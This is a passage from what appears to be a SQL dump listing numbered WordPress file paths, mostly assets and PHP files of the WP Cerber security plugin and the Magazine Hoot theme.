ssets/flags/no.gif'),(1536,'wp-content/plugins/wp-cerber/assets/flags/np.gif'),(1537,'wp-content/plugins/wp-cerber/assets/flags/nr.gif'),(1538,'wp-content/plugins/wp-cerber/assets/flags/nu.gif'),(1539,'wp-content/plugins/wp-cerber/assets/flags/nz.gif'),(1540,'wp-content/plugins/wp-cerber/assets/flags/om.gif'),(1541,'wp-content/plugins/wp-cerber/assets/flags/pa.gif'),(1542,'wp-content/plugins/wp-cerber/assets/flags/pe.gif'),(1543,'wp-content/plugins/wp-cerber/assets/flags/pf.gif'),(1544,'wp-content/plugins/wp-cerber/assets/flags/pg.gif'),(1545,'wp-content/plugins/wp-cerber/assets/flags/ph.gif'),(1546,'wp-content/plugins/wp-cerber/assets/flags/pk.gif'),(1547,'wp-content/plugins/wp-cerber/assets/flags/pl.gif'),(1548,'wp-content/plugins/wp-cerber/assets/flags/pm.gif'),(1549,'wp-content/plugins/wp-cerber/assets/flags/pn.gif'),(1550,'wp-content/plugins/wp-cerber/assets/flags/pr.gif'),(1551,'wp-content/plugins/wp-cerber/assets/flags/ps.gif'),(1552,'wp-content/plugins/wp-cerber/assets/flags/pt.gif'),(1553,'wp-content/plugins/wp-cerber/assets/flags/pw.gif'),(1554,'wp-content/plugins/wp-cerber/assets/flags/py.gif'),(1555,'wp-content/plugins/wp-cerber/assets/flags/qa.gif'),(1556,'wp-content/plugins/wp-cerber/assets/flags/re.gif'),(1557,'wp-content/plugins/wp-cerber/assets/flags/ro.gif'),(1558,'wp-content/plugins/wp-cerber/assets/flags/rs.gif'),(1559,'wp-content/plugins/wp-cerber/assets/flags/ru.gif'),(1560,'wp-content/plugins/wp-cerber/assets/flags/rw.gif'),(1561,'wp-content/plugins/wp-cerber/assets/flags/sa.gif'),(1562,'wp-content/plugins/wp-cerber/assets/flags/sb.gif'),(1563,'wp-content/plugins/wp-cerber/assets/flags/sc.gif'),(1564,'wp-content/plugins/wp-cerber/assets/flags/sd.gif'),(1565,'wp-content/plugins/wp-cerber/assets/flags/se.gif'),(1566,'wp-content/plugins/wp-cerber/assets/flags/sg.gif'),(1567,'wp-content/plugins/wp-cerber/assets/flags/sh.gif'),(1568,'wp-content/plugins/wp-cerber/assets/flags/si.gif'),(1569,'wp-content/plugins/wp-cerber/assets/flags/sj.gif'),(1570,'wp-content/plugins/wp-cerber/assets/flags/sk.gif'),(1571,'wp-content/plugins/wp-cerber/assets/flags/sl.gif'),(1572,'wp-content/plugins/wp-cerber/assets/flags/sm.gif'),(1573,'wp-content/plugins/wp-cerber/assets/flags/sn.gif'),(1574,'wp-content/plugins/wp-cerber/assets/flags/so.gif'),(1575,'wp-content/plugins/wp-cerber/assets/flags/sr.gif'),(1576,'wp-content/plugins/wp-cerber/assets/flags/ss.gif'),(1577,'wp-content/plugins/wp-cerber/assets/flags/st.gif'),(1578,'wp-content/plugins/wp-cerber/assets/flags/sv.gif'),(1579,'wp-content/plugins/wp-cerber/assets/flags/sx.gif'),(1580,'wp-content/plugins/wp-cerber/assets/flags/sy.gif'),(1581,'wp-content/plugins/wp-cerber/assets/flags/sz.gif'),(1582,'wp-content/plugins/wp-cerber/assets/flags/tc.gif'),(1583,'wp-content/plugins/wp-cerber/assets/flags/td.gif'),(1584,'wp-content/plugins/wp-cerber/assets/flags/tf.gif'),(1585,'wp-content/plugins/wp-cerber/assets/flags/tg.gif'),(1586,'wp-content/plugins/wp-cerber/assets/flags/th.gif'),(1587,'wp-content/plugins/wp-cerber/assets/flags/tj.gif'),(1588,'wp-content/plugins/wp-cerber/assets/flags/tk.gif'),(1589,'wp-content/plugins/wp-cerber/assets/flags/tl.gif'),(1590,'wp-content/plugins/wp-cerber/assets/flags/tm.gif'),(1591,'wp-content/plugins/wp-cerber/assets/flags/tn.gif'),(1592,'wp-content/plugins/wp-cerber/assets/flags/to.gif'),(1593,'wp-content/plugins/wp-cerber/assets/flags/tr.gif'),(1594,'wp-content/plugins/wp-cerber/assets/flags/tt.gif'),(1595,'wp-content/plugins/wp-cerber/assets/flags/tv.gif'),(1596,'wp-content/plugins/wp-cerber/assets/flags/tw.gif'),(1597,'wp-content/plugins/wp-cerber/assets/flags/tz.gif'),(1598,'wp-content/plugins/wp-cerber/assets/flags/ua.gif'),(1599,'wp-content/plugins/wp-cerber/assets/flags/ug.gif'),(1600,'wp-content/plugins/wp-cerber/assets/flags/um.gif'),(1601,'wp-content/plugins/wp-cerber/assets/flags/us.gif'),(1602,'wp-content/plugins/wp-cerber/assets/flags/uy.gif'),(1603,'wp-content/plugins/wp-cerber/assets/flags/uz.gif'),(1604,'wp-content/plugins/wp-cerber/assets/flags/va.gif'),(1605,'wp-content/plugins/wp-cerber/assets/flags/vc.gif'),(1606,'wp-content/plugins/wp-cerber/assets/flags/ve.gif'),(1607,'wp-content/plugins/wp-cerber/assets/flags/vg.gif'),(1608,'wp-content/plugins/wp-cerber/assets/flags/vi.gif'),(1609,'wp-content/plugins/wp-cerber/assets/flags/vn.gif'),(1610,'wp-content/plugins/wp-cerber/assets/flags/vu.gif'),(1611,'wp-content/plugins/wp-cerber/assets/flags/wf.gif'),(1612,'wp-content/plugins/wp-cerber/assets/flags/ws.gif'),(1613,'wp-content/plugins/wp-cerber/assets/flags/ye.gif'),(1614,'wp-content/plugins/wp-cerber/assets/flags/yt.gif'),(1615,'wp-content/plugins/wp-cerber/assets/flags/za.gif'),(1616,'wp-content/plugins/wp-cerber/assets/flags/zm.gif'),(1617,'wp-content/plugins/wp-cerber/assets/flags/zw.gif'),(1618,'wp-content/plugins/wp-cerber/assets/goo-translate.png'),(1619,'wp-content/plugins/wp-cerber/assets/icons/style.css'),(1620,'wp-content/plugins/wp-cerber/assets/inspector.png'),(1621,'wp-content/plugins/wp-cerber/assets/magnific/LICENSE'),(1622,'wp-content/plugins/wp-cerber/assets/magnific/jquery.magnific-popup.min.js'),(1623,'wp-content/plugins/wp-cerber/assets/magnific/magnific-popup.css'),(1624,'wp-content/plugins/wp-cerber/assets/multi/license.txt'),(1625,'wp-content/plugins/wp-cerber/assets/multi/multi.css'),(1626,'wp-content/plugins/wp-cerber/assets/multi/multi.js'),(1627,'wp-content/plugins/wp-cerber/assets/multi/multi.min.js'),(1628,'wp-content/plugins/wp-cerber/assets/nexus.css'),(1629,'wp-content/plugins/wp-cerber/assets/rateit.png'),(1630,'wp-content/plugins/wp-cerber/assets/rateit2.png'),(1631,'wp-content/plugins/wp-cerber/assets/scanner.js'),(1632,'wp-content/plugins/wp-cerber/assets/select2/LICENSE.md'),(1633,'wp-content/plugins/wp-cerber/assets/select2/dist/css/select2.min.css'),(1634,'wp-content/plugins/wp-cerber/assets/select2/dist/js/select2.min.js'),(1635,'wp-content/plugins/wp-cerber/assets/sh/scripts/shBrushPhp.js'),(1636,'wp-content/plugins/wp-cerber/assets/sh/scripts/shCore.js'),(1637,'wp-content/plugins/wp-cerber/assets/sh/styles/shCore.css'),(1638,'wp-content/plugins/wp-cerber/assets/sh/styles/shThemeDefault.css'),(1639,'wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.css'),(1640,'wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.js'),(1641,'wp-content/plugins/wp-cerber/assets/ui-stack.css'),(1642,'wp-content/plugins/wp-cerber/assets/ui-stack.js'),(1643,'wp-content/plugins/wp-cerber/assets/wp-admin.js'),(1644,'wp-content/plugins/wp-cerber/assets/wrench.png'),(1645,'wp-content/plugins/wp-cerber/cerber-2fa.php'),(1646,'wp-content/plugins/wp-cerber/cerber-addons.php'),(1647,'wp-content/plugins/wp-cerber/cerber-common.php'),(1648,'wp-content/plugins/wp-cerber/cerber-ds.php'),(1649,'wp-content/plugins/wp-cerber/cerber-lab.php'),(1650,'wp-content/plugins/wp-cerber/cerber-load.php'),(1651,'wp-content/plugins/wp-cerber/cerber-maintenance.php'),(1652,'wp-content/plugins/wp-cerber/cerber-pluggable.php'),(1653,'wp-content/plugins/wp-cerber/cerber-request.php'),(1654,'wp-content/plugins/wp-cerber/cerber-ripe.php'),(1655,'wp-content/plugins/wp-cerber/cerber-scanner.php'),(1656,'wp-content/plugins/wp-cerber/cerber-settings.php'),(1657,'wp-content/plugins/wp-cerber/cerber-whois.php'),(1658,'wp-content/plugins/wp-cerber/changelog.txt'),(1659,'wp-content/plugins/wp-cerber/index.php'),(1660,'wp-content/plugins/wp-cerber/jetflow.php'),(1661,'wp-content/plugins/wp-cerber/modules/aaa-wp-cerber.php'),(1662,'wp-content/plugins/wp-cerber/nexus/cerber-nexus-master.php'),(1663,'wp-content/plugins/wp-cerber/nexus/cerber-nexus-slave.php'),(1664,'wp-content/plugins/wp-cerber/nexus/cerber-nexus.php'),(1665,'wp-content/plugins/wp-cerber/nexus/cerber-slave-list.php'),(1666,'wp-content/plugins/wp-cerber/readme.txt'),(1667,'wp-content/plugins/wp-cerber/wp-cerber.php'),(1668,'wp-content/themes/index.php'),(1669,'wp-content/themes/magazine-hoot/404.php'),(1670,'wp-content/themes/magazine-hoot/README.txt'),(1671,'wp-content/themes/magazine-hoot/comments.php'),(1672,'wp-content/themes/magazine-hoot/css/jetpack.css'),(1673,'wp-content/themes/magazine-hoot/css/jetpack.min.css'),(1674,'wp-content/themes/magazine-hoot/css/lightSlider.css'),(1675,'wp-content/themes/magazine-hoot/css/lightSlider.min.css'),(1676,'wp-content/themes/magazine-hoot/footer.php'),(1677,'wp-content/themes/magazine-hoot/front-page.php'),(1678,'wp-content/themes/magazine-hoot/functions.php'),(1679,'wp-content/themes/magazine-hoot/header.php'),(1680,'wp-content/themes/magazine-hoot/hybrid/admin/class-post-layout.php'),(1681,'wp-content/themes/magazine-hoot/hybrid/admin/class-term-layout.php'),(1682,'wp-content/themes/magazine-hoot/hybrid/admin/functions-admin.php'),(1683,'wp-content/themes/magazine-hoot/hybrid/changelog.md'),(1684,'wp-content/themes/magazine-hoot/hybrid/composer.json'),(1685,'wp-content/themes/magazine-hoot/hybrid/contributing.md'),(1686,'wp-content/themes/magazine-hoot/hybrid/css/admin.css'),(1687,'wp-content/themes/magazine-hoot/hybrid/css/admin.min.css'),(1688,'wp-content/themes/magazine-hoot/hybrid/css/customize-controls.css'),(1689,'wp-content/themes/magazine-hoot/hybrid/css/customize-controls.min.css'),(1690,'wp-content/themes/magazine-hoot/hybrid/css/gallery.css'),(1691,'wp-content/themes/magazine-hoot/hybrid/css/gallery.min.css'),(1692,'wp-content/themes/magazine-hoot/hybrid/css/one-five-rtl.css'),(1693,'wp-content/themes/magazine-hoot/hybrid/css/one-five-rtl.min.css'),(1694,'wp-content/themes/magazine-hoot/hybrid/css/one-five.css'),(1695,'wp-content/themes/magazine-hoot/hybrid/css/one-five.min.css'),(1696,'wp-content/themes/magazine-hoot/hybrid/customize/control-checkbox-multiple.php'),(1697,'wp-content/themes/magazine-hoot/hybrid/customize/control-dropdown-terms.php'),(1698,'wp-content/themes/magazine-hoot/hybrid/customize/control-layout.php'),(1699,'wp-content/themes/magazine-hoot/hybrid/customize/control-palette.php'),(1700,'wp-content/themes/magazine-hoot/hybrid/customize/control-radio-image.php'),(1701,'wp-content/themes/magazine-hoot/hybrid/customize/control-select-group.php'),(1702,'wp-content/themes/magazine-hoot/hybrid/customize/control-select-multiple.php'),(1703,'wp-content/themes/magazine-hoot/hybrid/customize/setting-array-map.php'),(1704,'wp-content/themes/magazine-hoot/hybrid/customize/setting-image-data.php'),(1705,'wp-content/themes/magazine-hoot/hybrid/ext/breadcrumb-trail.php'),(1706,'wp-content/themes/magazine-hoot/hybrid/ext/cleaner-gallery.php'),(1707,'wp-content/themes/magazine-hoot/hybrid/ext/get-the-image.php'),(1708,'wp-content/themes/magazine-hoot/hybrid/extend/css/admin-widgets.css'),(1709,'wp-content/themes/magazine-hoot/hybrid/extend/css/admin-widgets.min.css'),(1710,'wp-content/themes/magazine-hoot/hybrid/extend/css/font-awesome.css'),(1711,'wp-content/themes/magazine-hoot/hybrid/extend/css/font-awesome.min.css'),(1712,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-brands-400.eot'),(1713,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-brands-400.svg'),(1714,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-brands-400.ttf'),(1715,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-brands-400.woff'),(1716,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-brands-400.woff2'),(1717,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-regular-400.eot'),(1718,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-regular-400.svg'),(1719,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-regular-400.ttf'),(1720,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-regular-400.woff'),(1721,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-regular-400.woff2'),(1722,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-solid-900.eot'),(1723,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-solid-900.svg'),(1724,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-solid-900.ttf'),(1725,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-solid-900.woff'),(1726,'wp-content/themes/magazine-hoot/hybrid/extend/css/webfonts/fa-solid-900.woff2'),(1727,'wp-content/themes/magazine-hoot/hybrid/extend/customize/assets/script.js'),(1728,'wp-content/themes/magazine-hoot/hybrid/extend/customize/assets/style.css'),(1729,'wp-content/themes/magazine-hoot/hybrid/extend/customize/control-content.php'),(1730,'wp-content/themes/magazine-hoot/hybrid/extend/customize/control-group.php'),(1731,'wp-content/themes/magazine-hoot/hybrid/extend/customize/control-icon.php'),(1732,'wp-content/themes/magazine-hoot/hybrid/extend/customize/control-multi-checkbox.php'),(1733,'wp-content/themes/magazine-hoot/hybrid/extend/customize/control-preset-pattern.php'),(1734,'wp-content/themes/magazine-hoot/hybrid/extend/customize/control-radio-image.php'),(1735,'wp-content/themes/magazine-hoot/hybrid/extend/customize/control-sortlist.php'),(1736,'wp-content/themes/magazine-hoot/hybrid/extend/customize/customize.php'),(1737,'wp-content/themes/magazine-hoot/hybrid/extend/customize/functions.php'),(1738,'wp-content/themes/magazine-hoot/hybrid/extend/customize/interface.php'),(1739,'wp-content/themes/magazine-hoot/hybrid/extend/customize/sanitization.php'),(1740,'wp-content/themes/magazine-hoot/hybrid/extend/customize/style-builder.php'),(1741,'wp-content/themes/magazine-hoot/hybrid/extend/extend.php'),(1742,'wp-content/themes/magazine-hoot/hybrid/extend/extensions/widgets.php'),(1743,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/0_preview.jpg'),(1744,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/1.png'),(1745,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/1_preview.jpg'),(1746,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/2.png'),(1747,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/2_preview.jpg'),(1748,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/3.png'),(1749,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/3_preview.jpg'),(1750,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/4.png'),(1751,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/4_preview.jpg'),(1752,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/4a.png'),(1753,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/4b.png'),(1754,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/5.png'),(1755,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/5_preview.jpg'),(1756,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/6.png'),(1757,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/6_preview.jpg'),(1758,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/7.png'),(1759,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/7_preview.jpg'),(1760,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/8.png'),(1761,'wp-content/themes/magazine-hoot/hybrid/extend/images/patterns/8_preview.jpg'),(1762,'wp-content/themes/magazine-hoot/hybrid/extend/includes/color.php'),(1763,'wp-content/themes/magazine-hoot/hybrid/extend/includes/enum.php'),(1764,'wp-content/themes/magazine-hoot/hybrid/extend/includes/helpers.php'),(1765,'wp-content/themes/magazine-hoot/hybrid/extend/includes/sanitization.php'),(1766,'wp-content/themes/magazine-hoot/hybrid/extend/includes/scripts.php'),(1767,'wp-content/themes/magazine-hoot/hybrid/extend/includes/styles.php'),(1768,'wp-content/themes/magazine-hoot/hybrid/extend/includes/template.php'),(1769,'wp-content/themes/magazine-hoot/hybrid/extend/js/admin-widgets.js'),(1770,'wp-content/themes/magazine-hoot/hybrid/extend/js/admin-widgets.min.js'),(1771,'wp-content/themes/magazine-hoot/hybrid/hybrid.php'),(1772,'wp-content/themes/magazine-hoot/hybrid/inc/class-chat.php'),(1773,'wp-content/themes/magazine-hoot/hybrid/inc/class-layout.php'),(1774,'wp-content/themes/magazine-hoot/hybrid/inc/class-media-grabber.php'),(1775,'wp-content/themes/magazine-hoot/hybrid/inc/class-media-meta.php'),(1776,'wp-content/themes/magazine-hoot/hybrid/inc/class-registry.php'),(1777,'wp-content/themes/magazine-hoot/hybrid/inc/class-template-hierarchy.php'),(1778,'wp-content/themes/magazine-hoot/hybrid/inc/class-template.php'),(1779,'wp-content/themes/magazine-hoot/hybrid/inc/functions-attr.php'),(1780,'wp-content/themes/magazine-hoot/hybrid/inc/functions-context.php'),(1781,'wp-content/themes/magazine-hoot/hybrid/inc/functions-customize.php'),(1782,'wp-content/themes/magazine-hoot/hybrid/inc/functions-deprecated.php'),(1783,'wp-content/themes/magazine-hoot/hybrid/inc/functions-filters.php'),(1784,'wp-content/themes/magazine-hoot/hybrid/inc/functions-fonts.php'),(1785,'wp-content/themes/magazine-hoot/hybrid/inc/functions-formats.php'),(1786,'wp-content/themes/magazine-hoot/hybrid/inc/functions-head.php'),(1787,'wp-content/themes/magazine-hoot/hybrid/inc/functions-i18n.php'),(1788,'wp-content/themes/magazine-hoot/hybrid/inc/functions-layouts.php'),(1789,'wp-content/themes/magazine-hoot/hybrid/inc/functions-meta.php'),(1790,'wp-content/themes/magazine-hoot/hybrid/inc/functions-scripts.php'),(1791,'wp-content/themes/magazine-hoot/hybrid/inc/functions-sidebars.php'),(1792,'wp-content/themes/magazine-hoot/hybrid/inc/functions-styles.php'),(1793,'wp-content/themes/magazine-hoot/hybrid/inc/functions-templates.php'),(1794,'wp-content/themes/magazine-hoot/hybrid/inc/functions-utility.php'),(1795,'wp-content/themes/magazine-hoot/hybrid/inc/template-comments.php'),(1796,'wp-content/themes/magazine-hoot/hybrid/inc/template-general.php'),(1797,'wp-content/themes/magazine-hoot/hybrid/inc/template-media.php'),(1798,'wp-content/themes/magazine-hoot/hybrid/inc/template-post.php'),(1799,'wp-content/themes/magazine-hoot/hybrid/inc/template.php'),(1800,'wp-content/themes/magazine-hoot/hybrid/js/customize-controls.js'),(1801,'wp-content/themes/magazine-hoot/hybrid/js/customize-controls.min.js'),(1802,'wp-content/themes/magazine-hoot/hybrid/js/customize-preview.js'),(1803,'wp-content/themes/magazine-hoot/hybrid/js/customize-preview.min.js'),(1804,'wp-content/themes/magazine-hoot/hybrid/license.md'),(1805,'wp-content/themes/magazine-hoot/hybrid/readme.md'),(1806,'wp-content/themes/magazine-hoot/images/loading.gif'),(1807,'wp-content/themes/magazine-hoot/images/modulebg.jpg'),(1808,'wp-content/themes/magazine-hoot/images/select.png'),(1809,'wp-content/themes/magazine-hoot/include/admin/about.php'),(1810,'wp-content/themes/magazine-hoot/include/admin/class-tgm-plugin-activation.php'),(1811,'wp-content/themes/magazine-hoot/include/admin/css/about.css'),(1812,'wp-content/themes/magazine-hoot/include/admin/css/customize.css'),(1813,'wp-content/themes/magazine-hoot/include/admin/customizer-options.php'),(1814,'wp-content/themes/magazine-hoot/include/admin/images/1-1.png'),(1815,'wp-content/themes/magazine-hoot/include/admin/images/2-1.png'),(1816,'wp-content/themes/magazine-hoot/include/admin/images/2-2.png'),(1817,'wp-content/themes/magazine-hoot/include/admin/images/2-3.png'),(1818,'wp-content/themes/magazine-hoot/include/admin/images/3-1.png'),(1819,'wp-content/themes/magazine-hoot/include/admin/images/3-2.png'),(1820,'wp-content/themes/magazine-hoot/include/admin/images/3-3.png'),(1821,'wp-content/themes/magazine-hoot/include/admin/images/3-4.png'),(1822,'wp-content/themes/magazine-hoot/include/admin/images/4-1.png'),(1823,'wp-content/themes/magazine-hoot/include/admin/images/archive-big.png'),(1824,'wp-content/themes/magazine-hoot/include/admin/images/archive-block2.png'),(1825,'wp-content/themes/magazine-hoot/include/admin/images/archive-block3.png'),(1826,'wp-content/themes/magazine-hoot/include/admin/images/archive-medium.png'),(1827,'wp-content/themes/magazine-hoot/include/admin/images/archive-mosaic1.png'),(1828,'wp-content/themes/magazine-hoot/include/admin/images/archive-mosaic2.png'),(1829,'wp-content/themes/magazine-hoot/include/admin/images/archive-mosaic3.png'),(1830,'wp-content/themes/magazine-hoot/include/admin/images/archive-mosaic4.png'),(1831,'wp-content/themes/magazine-hoot/include/admin/images/archive-small.png'),(1832,'wp-content/themes/magazine-hoot/include/admin/images/content-block-style-1.png'),(1833,'wp-content/themes/magazine-hoot/include/admin/images/content-block-style-2.png'),(1834,'wp-content/themes/magazine-hoot/include/admin/images/content-block-style-3.png'),(1835,'wp-content/themes/magazine-hoot/include/admin/images/content-block-style-4.png'),(1836,'wp-content/themes/magazine-hoot/include/admin/images/header-layout.png'),(1837,'wp-content/themes/magazine-hoot/include/admin/images/import-clickbutton.png'),(1838,'wp-content/themes/magazine-hoot/include/admin/images/menu-table.png'),(1839,'wp-content/themes/magazine-hoot/include/admin/images/page-header.png'),(1840,'wp-content/themes/magazine-hoot/include/admin/images/pageheader-both.png'),(1841,'wp-content/themes/magazine-hoot/include/admin/images/pageheader-incontent.png'),(1842,'wp-content/themes/magazine-hoot/include/admin/images/pageheader-none.png'),(1843,'wp-content/themes/magazine-hoot/include/admin/images/pageheader-stretch.png'),(1844,'wp-content/themes/magazine-hoot/include/admin/images/posts-list-style-1.png'),(1845,'wp-content/themes/magazine-hoot/include/admin/images/posts-list-style-2.png'),(1846,'wp-content/themes/magazine-hoot/include/admin/images/posts-list-style-3.png'),(1847,'wp-content/themes/magazine-hoot/include/admin/images/premium-backgrounds.jpg'),(1848,'wp-content/themes/magazine-hoot/include/admin/images/premium-blogstyles.jpg'),(1849,'wp-content/themes/magazine-hoot/include/admin/images/premium-carousels.jpg'),(1850,'wp-content/themes/magazine-hoot/include/admin/images/premium-colors.jpg'),(1851,'wp-content/themes/magazine-hoot/include/admin/images/premium-googlefonts.jpg'),(1852,'wp-content/themes/magazine-hoot/include/admin/images/premium-header-top.jpg'),(1853,'wp-content/themes/magazine-hoot/include/admin/images/premium-lesscss.jpg'),(1854,'wp-content/themes/magazine-hoot/include/admin/images/premium-lightbox.jpg'),(1855,'wp-content/themes/magazine-hoot/include/admin/images/premium-menuicons.jpg'),(1856,'wp-content/themes/magazine-hoot/include/admin/images/premium-scroller.jpg'),(1857,'wp-content/themes/magazine-hoot/include/admin/images/premium-shortcodes.jpg'),(1858,'wp-content/themes/magazine-hoot/include/admin/images/premium-sliders.jpg'),(1859,'wp-content/themes/magazine-hoot/include/admin/images/premium-support.jpg'),(1860,'wp-content/themes/magazine-hoot/include/admin/images/premium-typography.jpg'),(1861,'wp-content/themes/magazine-hoot/include/admin/images/premium-widgets.jpg'),(1862,'wp-content/themes/magazine-hoot/include/admin/images/qstart-fpmodule.png'),(1863,'wp-content/themes/magazine-hoot/include/admin/images/qstart-staticpage.png'),(1864,'wp-content/themes/magazine-hoot/include/admin/images/sidebar-full.png'),(1865,'wp-content/themes/magazine-hoot/include/admin/images/sidebar-narrow-left-left.png'),(1866,'wp-content/themes/magazine-hoot/include/admin/images/sidebar-narrow-left-right.png'),(1867,'wp-content/themes/magazine-hoot/include/admin/images/sidebar-narrow-left.png'),(1868,'wp-content/themes/magazine-hoot/include/admin/images/sidebar-narrow-right-right.png'),(1869,'wp-content/themes/magazine-hoot/include/admin/images/sidebar-narrow-right.png'),(1870,'wp-content/themes/magazine-hoot/include/admin/images/sidebar-none.png'),(1871,'wp-content/themes/magazine-hoot/include/admin/images/sidebar-wide-left.png'),(1872,'wp-content/themes/magazine-hoot/include/admin/images/sidebar-wide-right.png'),(1873,'wp-content/themes/magazine-hoot/include/admin/images/slider-type-carousel.png'),(1874,'wp-content/themes/magazine-hoot/include/admin/images/slider-type-html.png'),(1875,'wp-content/themes/magazine-hoot/include/admin/images/slider-type-image.png'),(1876,'wp-content/themes/magazine-hoot/include/admin/images/slider-width-boxed.png'),(1877,'wp-content/themes/magazine-hoot/include/admin/images/slider-width-stretch.png'),(1878,'wp-content/themes/magazine-hoot/include/admin/js/about.js'),(1879,'wp-content/themes/magazine-hoot/include/admin/js/customize-controls.js'),(1880,'wp-content/themes/magazine-hoot/include/admin/js/customize-preview.js'),(1881,'wp-content/themes/magazine-hoot/include/admin/trt-customize-pro/class-customize.php'),(1882,'wp-content/themes/magazine-hoot/include/admin/trt-customize-pro/license.md'),(1883,'wp-content/themes/magazine-hoot/include/admin/trt-customize-pro/readme.md'),(1884,'wp-content/themes/magazine-hoot/include/admin/trt-customize-pro/section-pro.php'),(1885,'wp-content/themes/magazine-hoot/include/admin/widget-announce.php'),(1886,'wp-content/themes/magazine-hoot/include/admin/widget-content-blocks.php'),(1887,'wp-content/themes/magazine-hoot/include/admin/widget-content-posts-blocks.php'),(1888,'wp-content/themes/magazine-hoot/include/admin/widget-cta.php'),(1889,'wp-content/themes/magazine-hoot/include/admin/widget-parts.php'),(1890,'wp-content/themes/magazine-hoot/include/admin/widget-post-grid.php'),(1891,'wp-content/themes/magazine-hoot/include/admin/widget-post-list.php'),(1892,'wp-content/themes/magazine-hoot/include/admin/widget-social-icons.php'),(1893,'wp-content/themes/magazine-hoot/include/attr-schema.php'),(1894,'wp-content/themes/magazine-hoot/include/attr.php'),(1895,'wp-content/themes/magazine-hoot/include/css.php'),(1896,'wp-content/themes/magazine-hoot/include/enqueue.php'),(1897,'wp-content/themes/magazine-hoot/include/fonts.php'),(1898,'wp-content/themes/magazine-hoot/include/hoot-theme.php'),(1899,'wp-content/themes/magazine-hoot/include/media.php'),(1900,'wp-content/themes/magazine-hoot/include/menus.php'),(1901,'wp-content/themes/magazine-hoot/include/sidebars.php'),(1902,'wp-content/themes/magazine-hoot/include/template-helpers.php'),(1903,'wp-content/themes/magazine-hoot/include/theme-setup.php'),(1904,'wp-content/themes/magazine-hoot/index.php'),(1905,'wp-content/themes/magazine-hoot/js/hoot.theme.js'),(1906,'wp-content/themes/magazine-hoot/js/hoot.theme.min.js'),(1907,'wp-content/themes/magazine-hoot/js/jquery.fitvids.js'),(1908,'wp-content/themes/magazine-hoot/js/jquery.fitvids.min.js'),(1909,'wp-content/themes/magazine-hoot/js/jquery.lightSlider.js'),(1910,'wp-content/themes/magazine-hoot/js/jquery.lightSlider.min.js'),(1911,'wp-content/themes/magazine-hoot/js/jquery.parallax.js'),(1912,'wp-content/themes/magazine-hoot/js/jquery.parallax.min.js'),(1913,'wp-content/themes/magazine-hoot/js/jquery.superfish.js'),(1914,'wp-content/themes/magazine-hoot/js/jquery.superfish.min.js'),(1915,'wp-content/themes/magazine-hoot/js/modernizr.custom.js'),(1916,'wp-content/themes/magazine-hoot/js/modernizr.custom.min.js'),(1917,'wp-content/themes/magazine-hoot/license.txt'),(1918,'wp-content/themes/magazine-hoot/page.php'),(1919,'wp-content/themes/magazine-hoot/screenshot.jpg'),(1920,'wp-content/themes/magazine-hoot/searchform.php'),(1921,'wp-content/themes/magazine-hoot/sidebar-shop.php'),(1922,'wp-content/themes/magazine-hoot/sidebar.php'),(1923,'wp-content/themes/magazine-hoot/single.php'),(1924,'wp-content/themes/magazine-hoot/style.css'),(1925,'wp-content/themes/magazine-hoot/style.min.css'),(1926,'wp-content/themes/magazine-hoot/template-parts/comment-ping.php'),(1927,'wp-content/themes/magazine-hoot/template-parts/comment.php'),(1928,'wp-content/themes/magazine-hoot/template-parts/comments-error.php'),(1929,'wp-content/themes/magazine-hoot/template-parts/comments-nav.php'),(1930,'wp-content/themes/magazine-hoot/template-parts/content-archive-block2.php'),(1931,'wp-content/themes/magazine-hoot/template-parts/content-archive-block3.php'),(1932,'wp-content/themes/magazine-hoot/template-parts/content-archive.php'),(1933,'wp-content/themes/magazine-hoot/template-parts/content-page.php'),(1934,'wp-content/themes/magazine-hoot/template-parts/content.php'),(1935,'wp-content/themes/magazine-hoot/template-parts/error.php'),(1936,'wp-content/themes/magazine-hoot/template-parts/footer-footer.php'),(1937,'wp-content/themes/magazine-hoot/template-parts/footer-postfooter.php'),(1938,'wp-content/themes/magazine-hoot/template-parts/footer-subfooter.php'),(1939,'wp-content/themes/magazine-hoot/template-parts/loop-meta-shop.php'),(1940,'wp-content/themes/magazine-hoot/template-parts/loop-meta.php'),(1941,'wp-content/themes/magazine-hoot/template-parts/loop-nav.php'),(1942,'wp-content/themes/magazine-hoot/template-parts/menu-primary.php'),(1943,'wp-content/themes/magazine-hoot/template-parts/menu-secondary.php'),(1944,'wp-content/themes/magazine-hoot/template-parts/sidebar-below-header.php'),(1945,'wp-content/themes/magazine-hoot/template-parts/sidebar-header.php'),(1946,'wp-content/themes/magazine-hoot/template-parts/slider-html.php'),(1947,'wp-content/themes/magazine-